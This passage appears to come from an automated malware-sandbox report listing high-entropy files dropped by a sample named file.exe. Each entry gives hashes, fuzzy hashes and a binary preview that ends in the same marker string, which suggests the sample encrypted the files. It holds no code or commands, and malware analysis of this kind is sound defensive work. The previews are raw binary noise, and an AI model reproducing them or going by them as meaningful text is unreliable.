          SHA-256:1AD76FCBE53766E90529E536150AE46DF5DA549C2D91A4E3284FF8B33AF12C5E
          SHA-512:D1F9592FABDCAF89EBB5B6270D739926958F4823331F2CCDBF3AA7FDAF478C07AA9F6F27F5F64ACED5F6F5548A02453E191220E36EC0837391C3D14D6FFFD68F
          Malicious:false
          Preview:<?xml..9..}.H'7........r.....2.8...}."h3[..bg...Y..\..ef....:... ..|1....No-).+)?9[...q..._...l-..&tz...!2M'e|...jm.....8.x...7iP.s...5..K.-H..E.......&.;.".9.....m3D..ls.....wA....".....)...2..f[.:..>.M....&.QA..N...k...(....5.*9..._....:.s*(17=P.1.......v.Dn...Zw.].....x...N.bX.X+s|.... .q....K........e.....C|.gV...^"..#.G.......1.S..#U..f..:....;.G).3.tTW..-..jM.>8o.....F....t..8P..o.|.......[Y.F......%..P...*'.._@J.LV.6.;..g..*.d.M3...~..;N.}.Y.Y$G..4P..n]'>.4Go../;=2.J...v...rzK..s..a..7....D....JfFX....A..x_.........L..8hG...n..1b@..2...8./?L..f.....!C.Q&I.l6m.-..I.c=@]..:......Y.LE. ......Eu.q...8K...IC._n./....^E...*.T8c.?`k..;....p...Md...-w.......b.(..(.y.......Ch...}..r..&T..........v{Q|z..z_.}.8k..u,],r......S....r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):886
          Entropy (8bit):7.74247613325776
          Encrypted:false
          SSDEEP:24:d2vyrhRU24dg0vM32HuoFpHI7qaVKlv0k8vAYZiTkbD:IWR4eEhF0qa4lck8vAHiD
          MD5:3798CD9A0B40DC9429C596C2F2B22954
          SHA1:4E036B12892518B7DFB70BD77C6727132381642C
          SHA-256:5104D9CE97C32E637215B5A473EA614F3CDEB124BF480715B3D4AA36D48B4389
          SHA-512:E3CF2E34F7E09DBA13CF2302AE2030B024405C84CD451519D7115507B6039F4392443A6D6E472D85FF013C0D7EEB099C6C49849A3C8664012736A3F9496407B0
          Malicious:false
          Preview:<?xml...v...b..7...j.{.(...&.......u.O..xpX8-.....7.l.y.PJD..4|...p.......{.....mz..J;s..Q..Vw.!..k.&+P.zv."A%....z.`P..9.......8NchX.....i.=..d}....w..g.5.....A...y..yl5.%..[E......<. ........m{6b.......M.......(.......N.y..^%....a..@.....T|.+.&.X..NF..>.)..Z.0.j......n.a..z.^.b@.I..M.P>e..;.$.Pf..b..._.....5...]f...Z.7..o....A..S.Ky6.....|../xDX.j...'@.%h.f.q2../q..~A&.....6x..._.P:f{y......E.........N.._.v..(...T5...;4..*!..fY.k.b>....4.l]Y...N?.(..$@.\..UiXA...@......t....Z.t.7...l=?..D.`I "........!...U.-.;Y)...+..r...O~{....)0x..o.....Ia.....U...|..........J@..rK..3"..]../.....>...}.;.|........^...>.u....l..+..2g3%)..d..%5.K....8^(c..cBA6L........r.j(*./'.G.>...........I.d;f5....Q..zF.'.y........A.....K.*.k.....>......Z.db~4Z..#"WNy.c.l8|h$..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1003
          Entropy (8bit):7.78191195210764
          Encrypted:false
          SSDEEP:24:vYoWVauEfihQKkEJeeCB3MkQPQorouaOSteDfjV4RqciKggDEgmriTkbD:TS3EaaKlClMToocujSujW4ciqiD
          MD5:04779DB841A1EEBC6F2025440DDB9716
          SHA1:63AD5E2AD19A4A6004241B8D8C58D078B5F0D9F5
          SHA-256:D369BEF80C7E51D92BE1897E927370E84DDDF82A294CBBF62F477842376D7E0F
          SHA-512:3B4BDC49D60A6CB51192C675086062D9E52EFD0420F02B87DFD5056A6599C1F8E09709BB93199427663BAA64A1FF9B60C7C74E85999499CE9EB98DC6905885C7
          Malicious:false
          Preview:<?xml...a&W.....vm4I...5...X...c\...}R.;.fl....r.0..N.5.-H.2id.T.....-M.b.....$.%e.a.n|.%N.&^);..&uU.+...$...t\...>(kt..Xz.[.....q^.A.....:...w...+.....w....xr.X..!.Q.. .Y..[%,X....<.....3lF9.2:98.....ym..'._h...s]~..yl .q.3..^u.!.0.+.f*O..^P..Y.D..s..$*..W.F./.{...F..`..2W...Ob..c.>..&....(..0..a..8q...\.W.l...v|@z..K7R..Hw.d...Y..{.t....../ oY..w.O".#uL~..G..!..]./...?..l.E.m7'...;..<...}...H18.V.S_g..`=].!.I..QIs..a...#h...eH.5C(.i82..g77..p(.Mery..t?.a.....<.!?..i....<S.|.`X.|,^..\<.-..<....q.<.]N^.....@../.4..u(..,?m.P....A.S.K.M.&.=.<.....J..4M.6.Tz/...C ..3..f.v.......MG..l..N'.1....W.(@O..0vt.....;.(vq."..,..{..]n?."..6...5.l>7...x^...'srR(4..eS..."....M.6~Tn2z.t..,.....'.{..u8..+..e<S.X#.PF....Z.2.S....'.F.D7.sH..z...&.]*....R+.X.F.\W..../#Eqs.E..8......G...j.<G...*....p......}W.5........U.....q$.>..1..4....\..t.+.H;Dq....a...........qX.dC!.^o...[..I..D..X..Q..|b..M._, U lr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4D
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):726
          Entropy (8bit):7.738218597114129
          Encrypted:false
          SSDEEP:12:Et+PCrBiVTq7+wks5rCAH+a8rP3sORFZEox/yr/iMvQJeHiFip8H5dQQTJoIUYL1:I+P2cG+psya8rP3xThar5yqAip+fJoLm
          MD5:9BDDC574FC928BE9F478E13DCFE428C7
          SHA1:99F673BFB3F319CDC7205F7037BD5D723340E924
          SHA-256:9652F457AE7777B13A9DA6345205BF7CA5267A64E3E2502613B7658926C1D4F7
          SHA-512:71694F01C7A9B4B8711189B90FB90785CBBE6A3574586DA13ADFFE844147C17592B542297F4A7AAB806C719226E03ED59699C9908933EFBB9166640ECA1C2E10
          Malicious:false
          Preview:<?xmly.s.N...{.8.V...)R..`.%..\Q&+...0o.z*....fL.7._k.oh.Es.8.g0W.Z.P..."....:..)..K..0c..A...&q..E.s...D%..=._l.Y......m.AF6...d..:....D.1. .....#./.g.K.....R^J...$T.o..c9r0.BF...".....\%..........4...........D$.=...i@......(..../...A...Q:......F..%~..G.[.-@..O...../.l.b...u....k7..2WZ}....3...|5?..F.&H}.gMgX...myj.........^.B)R.N5Rc-...G..p.Ss.7.q.!........xD...'k.}..]..E._.T..vR..C~.v.....a..b..m...8.emJ...?D.......@.[....LQi...`<......a.:..........H.q.a.X..X|d..vt?......U.M..O..N...*C~sy*.....L9.K.(>.R.....'(F..e...dFK=.HB....A^.3...f.`<.De....M..{.C...~ry....M....}^.....3...0.i.b..X.........]?/...2.p./......r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):931
          Entropy (8bit):7.74898863433365
          Encrypted:false
          SSDEEP:24:5vLblsfWK2ts0babIisWuUWhL7JV88GiTkbD:FJaWKNIisWutL7JV80iD
          MD5:C07E99FA6EA7532D2E585F5D3B1D8C18
          SHA1:1601444BFCABDB1A92EDAA983D81615A457E6AEA
          SHA-256:8A7687E7BDD541786864C79E714E7DA89B95BD65E6450492ED7738E2B9186827
          SHA-512:26DCD5AE25078859AB8B9C5B286F7C1AF91EC0D0E650B281CDFF7CF28662E3BA52C6DAA5246DF54BD94E37F8E8451C081F9D9D33DCE5D5DCAF8598978E6E5982
          Malicious:false
          Preview:<?xml..B....q...:|4....&sp..n...r.dl-..}.7....=..YPL.OV..{.;.`...,A@.T.ms.l...B.^j..%....TY.v..'....1....f..3.Ib/r.1...?&.N.$.k7....+...J:...y,V'=.[..H.-m.......D..Lt.{...u.......t..K...2...5!C.R:.`%\7@7.g...RoPnP..: F(....VA.q..u.......avOfD3.@.I;vX5.t.....s...K...X.%+...u....F.?..U>..`W*2lX...$.!mI0bw.(...G8o..v.....U...2h.....8.....j........b....L8.]...KKJ......0&,..l....mK]...&.CF_p~.........]......r.....D..P.]..C.%w.<E.........'../.........uh..]..f..2?..\,..uKk.t=.i.........q...)c|.h..)..es..=...g.[v_.......5u.......=..niz...j6...V.I.v.J....;..!.M..z....>....z....i.;.[l.m.......(t=7f.....mOY.. G6&.=..(.s..M..M.9ey.^C=O.....o\..d.....Y.?..F7.O.3^.9.=3sPR...f.%...Bqz?..a)....9.......M.T...I*q..p.g..3..C...l.....B[s...O.c..Dt.K0.....C.+%.x...u.|....K.u...i,.Q.#..P.g^...,.~.Lpq..<.'U.^.K$pr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):923
          Entropy (8bit):7.774248444362352
          Encrypted:false
          SSDEEP:24:kydFWI5gXXwjB15nNxImp8EhN5ZGiTkbD:pHWIYXoBHnjBhNjjiD
          MD5:0965966E7E919DE17399E672BCDC21E8
          SHA1:8D4A24FE6927C87029E8C674A319CC070135A4E2
          SHA-256:E8633C55FE16C1AAE29FA204E3A3F7A32CB9DF244747357354803B3E66501810
          SHA-512:BAF2C216CFEE2646B97954DB0F26DF38EC403D913022B4AE08BB16B2942F14D86473CA6045B2BA54D0D6EF0336A83E9025EDA14937FBEEDE8D7461342BE49039
          Malicious:false
          Preview:<?xml....U.2s6..Q(4,l......*..x].O..v`...!...FBF4.2.$z..$...._w.&..v~.".......n2.8.n...~.29...z...QmQ.. ...}*s2...;mv}....:.S\.Q..y.....!V....y..L%~I....+...,..N.MtL5)...I.0$.?.R..Cj..+.G.........lj........\..{O....G<_.x...p.Rl....z.>... "....g3.P._{%....^..2(4>bo,.l...~..=..........R,7.rf.....ba......-.O....P....7..;l.n/.s.{..+....3<......W....q.4E....5.Tv.].:.uB..v9...n..^y..P.Y.....e...3..]...x\.[........Y.mu.rH....g...I.c......l....F.7'i..c.v...K.e.Y.L....O......O_3...2.....%....".W2["8..n9....y...>1.X.Os0...2$<.].......Jbp..x}$".{.#m.6>."2.Z|b..... Th.eSN...6...n.R.'..+<.........3....0K$..E.p..RU..@.....Z..z./..C.y.XwNn......)...,E..us.ei..r'.y&..1..x$..j.UZ..I}.2.&....ed.,../+D...>.xTJ.*..;.9&qv.~.S.,....sk.K#...)..7.QvB.G./...u......`.....[.^...}.b.P.pV...%....hX\.}....sq.m..)...F.......z..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1267
          Entropy (8bit):7.825401774510226
          Encrypted:false
          SSDEEP:24:aZFzJ7izyQKZUARh3I1somEHs33WtEc03/FV5PFJa9CztrGOiTkbD:eFIzEZDHqmf3WiFP59Ja9AtriiD
          MD5:5E5E639241BDA01CB51272430EEC52C6
          SHA1:3BE2A851DAA5414EC8B033CCC1E7CB85857D83BD
          SHA-256:90EF16943CCDF9143031F2209BCA73E9A663807154064E13DA17DB2C9EC8D11F
          SHA-512:06D14702192FBA5A681C0102A9961007346FA275C376A82380D4ABFC105454EB795A43369A1DDB44AE615B0A472E6E39F66663F651772890A71F44912C3D6B83
          Malicious:false
          Preview:<?xml.......C@....D_.(.......rl.!.o.r..8.F/..p..X~=...z.M..#B=..bB.tV..V.Wy....&.*no....k9x0...F"T....@eQB..r.~...s...P`.. ..m.eA...Q.0...J}...f...U>1w.&.k..3.+G....{b.j.r...O....'.0.:Tz...R.mY{.V.K4....>3.-=Y.jK...7..2.2.....KKp...f...H.....CzS|.R.J...J.....b./m/....O...Q...d...j4.9.Y...{{U8..,R..V . P2.k...%v.....T.........%....m..../........k_4.+..v...b..JUy$.R....~z".HM.....^.......#..s.W.\..R..W.Q.U{..:U>..]....i.../.h$\*..T.....8.q.*._..r.2.Y..~"._K...r....3GdP.Vi....F.0....a\..)j>2J.b.1OQ...\..>?l...*W...a.!(J..hm..&..P...|.B.a...Z.p....%..dS..5......e18[..W.%..iR...e.h...r....&bY#p..,DT.Py.].z.+.l.L(m...z.. .l"I7|{...lr....iw.....u|yh2......,..NX.S".D...[a7bD2W...$.'QB....{./).........`..h....W........P..D.....x....J)......u...I.,.....#X..u<$dI..7.A...J..W.0.`.d.Tho@X....Jv.bi,..aG.^.gx..0h.>w#x?....{...8.n.8...0....,..\....>.`..D..c.8A}loMKK.I..R..Y.H.G".........H..4....y..W^v...o.1......E`....hf..h...~ .a.:T........Nw.vA.....|g
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):719
          Entropy (8bit):7.629445225461814
          Encrypted:false
          SSDEEP:12:nAQx+QQ4l0D4LkaI7ah3i/JT1vWRe/N81b5rPFG24i8/ixpZacii9a:2myD44yh3AJTpra5TFGMyiTkbD
          MD5:F9F336F2A3A6AAE03D821A9253D7A02A
          SHA1:F6187A743644D2D0C47D80A1D35F0C96229A6B0F
          SHA-256:DFA7BF1829D7D4040A00CBF3EB7E498CA8EAE1906B51C4C775C03719DB905017
          SHA-512:2EDF34F8059F586A9A683A2FDC1A957EA6B60132E2C732D196CE14D008F3E797F4E9DC84027B169D9F0D9FF18E17A1736ED6E7664794600BD105428042F693C0
          Malicious:false
          Preview:<?xml.~;.....d..ny.B.u.O...........*..8`.i..b...}..K..e.NA.:p.{..1.....R.Q.pdI]...,65.0s8.,..l.xk.Z.7S9..W..}...d./.*...R.....N.]3...NWD...'..~.B6...a+R.*G.R..Y8.VM....zN.r.f,.Rr.M..$2.jR..kS..KbFT.:.3.ppS.X.9....[.9....v.U2.w.!/..!.U.....2..CY.6.+}..rm;.;K..O.t.E...3dQ.a..~..1.......y@...8..jeYD.18>.W.e.LJtf.......U4o....~...`....$..SXz..1..W.n.=.....T..F.P~.: ..~E.....|....yqtS_'..1..=.zH.......p.x..L..8SGM.d..4>.*..'.F.....y..'.......F).....C.%...7.&3...N5*..e.(a.x!=....P.p{/.4<.LA.h*.M...].v.F..^._.2ZS.Ds......../%.{...@|'...OI:3.j.6.v3'.b..s..@:....nGU(.g..nt>..`8..f..4..E...G...H..P..].t...n:...].=..x.k..?r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):723
          Entropy (8bit):7.688533315835616
          Encrypted:false
          SSDEEP:12:cp1uU9RbZK5cNUnQXxvatuJlL8ktDuZOiDTm0a1SapIcWPoT2ixpZacii9a:k1uU9RSEbhyt2xtD0nTm0a1VpqgyiTkX
          MD5:E5011C425C34D215F300A834424F4CE9
          SHA1:CCABC6691F9EB2C4D49EE1FBD614E0139568E6B9
          SHA-256:0BF20D2A8C88993225703E8BC2C4737C0E9EC92CBCF490D87810D6C760B7A2F5
          SHA-512:BAC0CC75775D473C95A313F1BF4FFC7588C6A3722ACC83F576C0BD16125E6D50D1705E90369EF7617FA1E518A0D7D2CCC742CD9B4571D1A1D878C974A61F7FC5
          Malicious:false
          Preview:<?xml..+..Eh.#.{.*...z.+.v..If..i.......85.j.`.......XW..1.;.....[...p.6..g..`O..)..A-G.....q5{L._.."$...0.J..p.....l...=h.w/>..tj..a.....#...9}.y.3V..HBbs....'..'T..,D.YSe..<.ZhM..v....6.....5....^.|......{...:.].#.|.+.#....1..=..z1.(..C!.R..R.e`.{....~...)....+.c...S.$.q...*./w\.......>P..'.....:...Z..@[ ty..W.p.e~...Aj`R.g..{..}..={...2h6Zq".}...L..!q.Sq.pMu.C=g...b...H....N. ....P......}..M...............W... ...8.{|..)M.!8VM=.f../...m.0L.#.lp-.r.i...Ks....8.~e...y&.z.:......W.l..+..|{O...L..3....k..t.2.Sr.-.'....4..>j. .s_>..|q.....)Uk.wI..>...3#O..D....v..B.q.^@.c/..D,..L.g."..8B..........5..$n.. Xx@#.a..<..j....1r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):817
          Entropy (8bit):7.766833091610306
          Encrypted:false
          SSDEEP:24:nAQNkhJZ5sUsmEptyP7W8tK57fl3oXGAViTkbD:LkDwdmiS7WGK57fkGAsiD
          MD5:806382194E295B467C95387D7D41204D
          SHA1:BF7B0835E234C5AB1001B4D956E6404B8580D1F6
          SHA-256:AC3894B068669189A19779D3949461CA485AB33A1A45E85248734B0AAA1978B2
          SHA-512:B92C1C750D74744369FF306AAF6271D6FABDE93423ACF0226726B881ED8D226CE6E2AB9E1F6AAB696B19C5013AAD8931C5BCCF14B40249CDEA6C0F1345C993B0
          Malicious:false
          Preview:<?xml...I.U..=.....N.....[...Q...-.(....C.N...|h.@.-.s^9:.|k...Q.=.{.}.7`.$.X.D]q@.x..o|xG.d...Xr..w.-.LA?'O...M.N....2VW...M..K.0....(.....d.......H...I_....H?D*0.^....}..g&..*h..5.h.I.\.../........$.s.......R.F....'..CNm...1..e.>...]{.Q..z...s.77.f...D..3.)..N.....4.b:w.+....J.......W..Y...|.....|g.7w.<?]....>..z..%.ru....h..0'.i..C..MRoY.AA...qi.6......6...... .]..^v..0"......]..).|.?..SqT.K.0...W...f.*.....!..h...b.@.T..../,..^....sy.....d.8^.u...i/h..ZV....8KnB.oCm!..p.........y...[.Y.m.....`....DC.F........ F....S-..r6.......b.Q..$,...Dm.,...%8_\\H..o.SB"....wO.4...R.2].p..%..m(./h....?..W......m....y..o.!.b.~I.OSp.p.8..Q.L0..M...+Z..N....b.b..m.d.P..R.?.=6......X....~......[E...H.,#.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):719
          Entropy (8bit):7.747671643611034
          Encrypted:false
          SSDEEP:12:MAf35ZcsDeexTu8GN4J7ECdMT+ADo78lo4X5rVAsF03CO7FPayrqixpZacii9a:MKJxTu14u+AD0iFVAsF6Cya4qiTkbD
          MD5:59B1E331A4431527EC55904ED6D60FC0
          SHA1:16EBB795489FAE548EC8DB26C5BE286EF7072796
          SHA-256:16BAE855CA4E8E2F433A31619ECAF12B3FFA90DD76CBEA2FA3D3B8646B6E875F
          SHA-512:53E976638E94C3E84977A7E81C8CE88BF4040725A1E08E7B97F08EF4C308A5AC9300848A279DE38BA3BD4D170BD45DCD030E8B74741FA6689E455E254DB98711
          Malicious:false
          Preview:<?xml.'.. .L..,.....%.{|....U:...W)....u..F....j..ik..l.r.>^. .N.d.b15..,..X.......".OA`]g.S6ci.U...T...d.R./.f..g...Y..JTO.Gy)....t......c$.f....S.7...:.....H.......BP.!....b....f.....F.4{...}.....J.....DvG...a..;....O...C....C.C....+F..T1.+..N.Fn.w..?..].. ..w@.W.i%.;..7.:.l.4...e.Q].....Lo$X}.(.6.......y<.=......%..p..).v....&~...-....5e<NX.|%.......~..K..26..j7f..7..2.7z<."..MD*/+.Z.`.2&o....mR..U.}..|V.....H..c.M.T...........mI..&O.....vj3z....a...\'..+.]b..\.2j."<..CR..G.......J<..A..@X......{.0..&..s.. ..,..nU.#.k....Q...#..N=..<.i...g.........H...{..K$......`^Vb.._.k...7.......,.z...Y..2..D..'..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):881
          Entropy (8bit):7.738687337890111
          Encrypted:false
          SSDEEP:24:qWOkjtGC3B7rek0N9auQbyhoGIqTp/LI01lkMWiTkbD:fjtGCRGvlQbDGZp/LI0X9iD
          MD5:118947B2B7F832199810E2C7443B56DD
          SHA1:A8CF8440DB9ED03B9971BF6CF698871B8BD0FC74
          SHA-256:85922FB28EE84CB8F595B8E01F76E58730BDD4D24414CE924307C1584C74B57E
          SHA-512:9ABD60C258137EDB8B41B112B7E6A984D086B8F3877A79BB6991168ADA77AF5180697EBA4A3F28496248DC10D03F1393F6A8E3EF93B218A6750B2225C96E8C9B
          Malicious:false
          Preview:<?xml.....i.3$...@.x....>....!..c..E.b....&.[#..c..t...{....W.kMl...sK...Z.H.S...g..!.7.6svlI..v....q2)g.X.q...d...*.:..o-Vg.......W..0I...$G...D7..`.^..s,...q)^...Jp..-....d...R..".5e.+...Pc..l.>bg(9.kr.......P..!..N.....d..M.tr...'wi...Ab..xw..C......Y.....a.68.....tN,..Fk.yA....*.D.......57b......'..;......u@.ZtnU7...........6...m.I.......98..f..j..|:xt...}F..~&MN|..wm..k....nr/.;...5.sEa......E..^.N).Ry3]r.*;.DI<L.F.D......6c[*.".M..n..2.r.....~.#..]f...Y._.....`....$H.@.n..f.1J2U...e.!.<.c.,b..!p}m....PG....S&..I%.Wds......XM..c"MI.%......NT.Q.A....G..<.R..g.D.{....T...-a.j..G..=.3.. ..q...|..{.v..L........A.{HE]...7.k...L.........*.D.."Q..hp..h.V...(......g..=t.../.}...I......M...t...q...i..^...V1e.)..h5du/....M,....ie.2..Lb.R.vN...s..N.ekr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):737
          Entropy (8bit):7.68141727149623
          Encrypted:false
          SSDEEP:12:OXP2eyDBNvIlugpqN/GAa9aMDCszRICBGxiVA+Q2/eRTc07fP73qE81sixpZaciD:OOeENt6qN/GhIMDCLCwkVzQ2md7+fsiq
          MD5:50529EBA6740B5E15B43D9707549D34C
          SHA1:E3C219C60726BA6EB93E1A81DB06EBCD2CFDEF53
          SHA-256:C36535A9606CEF2C54C038F75BA1E4B528F5275C755D70274A1988EABE39E17A
          SHA-512:E888477A5045796261690DCA4EF3408A1C359C1C41EFE50D41894B91774076C2CD80D35CD9D14D4CEF1BA597D4525BC538E153FA0FD5A463CD562EBB067AFBC0
          Malicious:false
          Preview:<?xml...tN#.Si:H....XR.].q-5......u...q.jQ.. .q....4/.;...T5..|.W./".....].x..J.8.U.L-6f2I.i.9\.......S..&...x':vL.9f.g......+..c.....Z....../.7.....1.k..........R.....].On.*.d.D.....j.).......1...}..........xV2.7....P27..A /`...I.`.~*0S....t...UV.f9.m.a...+...C.....I...I..-Z..Q...1..f.i1/.T.)...:M.....a}(8.....3..s.....<..N=...k...2.M...7D....$.}(.:F..x..%BRN>..S..B!.%}........T.V....2.@pX....:.yS..n..q....G*(4.....Je.. ...\..6=c....C...P.E...,j...9O..FTloC.....GNH..,k....k.../".8]..]LZ.i..L..}4Q&!{.v......@h7s...s..6S.$...0..^..a..g...{...v.y.!..KzP.......5-zP.....<,..}b..:>..c...x.tv..R..Mf.q...[&H.se*.,%I.h.%......r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1421
          Entropy (8bit):7.855040839918493
          Encrypted:false
          SSDEEP:24:GuJXeb6HqrLiaLxpq6TB2PIkixS30zpiaHLa13Sr8JBTrTeI1/iTkbD:1JXebNLiQxMOB5HBisapnciD
          MD5:635586FBFEFE8EB15866066900EDBEFC
          SHA1:4A390B0A96C596EFCA1AE3A47C7867B89C4B55DD
          SHA-256:90C2B1004B1C9DC48804709A45C4E18ECD2BD00B06BA755311CC50D30600004F
          SHA-512:64F58DF8602D9F7D176F25651C7F120C2F6BF205C4A3A5799BA46EEB7B2EEE7086BCA2F9A4A12DF2F5B886E6462BF11E221480FB59B96D20CC191B1646DD514E
          Malicious:false
          Preview:<?xmlc..n\...\!#..@`oVc.....XO....I>...6\._0$*\.......Z[@..:...^....3. j.....6.<..*..|X.^....6.B*6.....|0....h.i.w.O......2...6....E.0Y.o...HQ#+% ...."...2..2p.....-/W.v....R....a...8VE@..ob...6.eY&..^.T.BD.R.$.A~...E ^?..........DX..FqO.r.>[.I..&..^.B.`K...3.k..UA..^.%...\c..!.b..NQ............}.....Hs.....F..G.I..C.nx.D...@.m.....W........x......L.ET:.g...F.e.{...t.2h....HC..`.m...IU~?....B.11.X..k..j.........(.......!..S.=.7..6'......=....F.8....4..ses<g,.^.O.3(..m.zN....|;..f....g.A....&.A........iC.Y..r....H..H....8.*_....W....T..ux.N..?.:..3hRlx...1a...."<..:..I.(8..'.Dn.G.Cv....S....R......j.......^:m-f.. .R..[bL....lR,/.......MGC.Q..i...@T..?..o.s...g.EH....X.N...Bn..g............w.8.g...<.Z^.e...W...O..3....B&j.k../.@._..q..[.C...8amiT......5..t..U.Ed.6..7.?.xt.C...C.../.C...};....k.....L.}c..U.k..Q.l.........5.x}....c..|.>...l^......BK.$...L'....v....qyZX2q`E.f.h....).~.....`......:...^A..8..6.y. L..W....x2.........[....#..o.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1171
          Entropy (8bit):7.805042457808391
          Encrypted:false
          SSDEEP:24:MjQGq82xaKKPwBeH3oWavuzMd7ynMYNs4pbN/oMeybwGAsLiTkbD:MjS8NPpH4WamzMda/vqRy0WeiD
          MD5:E0553A985F6D428AB764864DBC5768CD
          SHA1:AB6833B2C286CA05870104692059BF46BEFEBCE6
          SHA-256:139899B2561F32D32537098BE9C10A36CFE3D6703C6D261058016C5243539C53
          SHA-512:FCFFC3A303C9F25D152060A114332DF6B2B6B36542AB752417093DF6DAAB624F6E9BEBB126FA85DA1E21CB30877496C4C5F635693D655DA4976A17558D22EB8E
          Malicious:false
          Preview:<?xml.....@.`..<...F.Q...*..*....}.../..Rn0...2...f..*..-Xd..(U..q...7.|...n.?.Q.z.s.7...GJ...r.@..0...}R..m..Y.M..Q.]j...S....m.s/...)7.Z.^.0..../....p.o+.}..l..Ja.%..:..)\..#.r.:j..n..>>.#.T...@..ub...z..q...t....y.....-.....N.t^.~H5|]...R..O....<c0y?........0....-z.........P#8@..Qw.....,...s*X...a.S7M.Y.hK.7.:..nj^.%.v&&....}.Ft.p.L.w..D.[0q.E.@W..D.....i...<^...ah.f.c...S.....:..`/C.vW..V...~.b^J..N...D..=.A.;>..{.UX..........4R....Y.;._......1.K.\...._..zP.t....5F."K......E...5_.....(S......x,.....?.Cn.f.;a./....Ag}...L.>..-.....'kj.m...{9..~.6...L~U...j..^~.Ys..q-.st.Q...o.(/m.LT..!O..LG...k. ...'_0F<B.L8v .e..M...pE.....jT.P...q{.N.g....>...;L]{?6M.Lr...".........-b..H..r[.9..U<..m.g\..........&..].8d.D~{....W$.u....L.d....OA..$......\..1.3...5....!..m,.S)...v..kr.../..0..\%.j....^-.@.......I...O..:A..2.........S..I.F.%....{.....$.M..:D..b.!..L.X....2bX.M.U..6kp0A.6.H.eY...^ .S:....yA.....q............$.t.^..zm.yN...k(.....Lq.l.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1176
          Entropy (8bit):7.823832854604398
          Encrypted:false
          SSDEEP:24:ZcGQFV7xKTH8pmrzzIjYqgsPJiILO6abpe7Eu3r8z+RPHPIuiTkbD:Za9pWIRgI9kKEug+RoLiD
          MD5:E716FC17D511994004782C91113D2446
          SHA1:6BB268A3BE29AEDD0BB43AD95B6B9B7BA6F55CC4
          SHA-256:BEF85FA323EA698D00CFE77955962B9A6DA1E6C3DAC2F129D0D08653B5F47E8F
          SHA-512:D1CF80A1D47872ED98154BEEEDB4476C0850DF39C8E25073A480C69B1AA31397CE55C1012BB800172D22EC0202D82584A67374357DAD552F4D3593E9E819000F
          Malicious:false
          Preview:<?xml:........L..ZC.9.e..s.v.......6p.n.k.V..&3B*.z>.Z......kp.F..h'.F.j........s...I..w.VFHL."7^i.g...q...{.K..9...n^)wf.<.S....[..t/n.<.o.b.z...)R.=..x.<.......$..{.O..3.. .8.hn-j..b.... t!o.n.kW.I....R.H.1.?.F.G..O?d...$...Ci.7T%(...zF..V.......{..hI.?.@*..F....QE..4.?....x..75.....i.......Qt.Y.....5l..e.9x.g.L.E.c....4..P...g;.+0cJ..90O.C%..ik.2...E|..d..w.;...).UW..+.=|.}..2.<....7./.)1Qq..c3..$Pg.&Q.........#..i. ...`P7.~....Np......../."....c..!..w0...c0.!:...[<.t..HB....p...k.x...z.....yv.&...Exo..Z....T.G.....e...4A2R..RQi.7[..._....B.'......A.6ip...E..+,..B.E..>.....11(l.*.Ynk..%)kU4*j.mu.N,.G.WGA ....a.q.]&.l.Q]......w...TRt.D-.. .(.z...+....q1.037...!.A2....*.t.eh*(,M.VQp2..~D.a......>F.A....>..8..m8u6./.....t..Gxg.V.@/.#=.i.y3.....S...*`[..@.T...{{....-$E~.<.f..@..[...R...0....)t.....(w.^l./.j. ...-y...LE"=<.}.....)#z.U..h..a{w..uq.z..R.*.<.vtD...2........d.e....q....7W...s....w.G...%~....kL...~.4......;&|..{...!.*.y.]y.mo..=:@E
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1155
          Entropy (8bit):7.867437044526188
          Encrypted:false
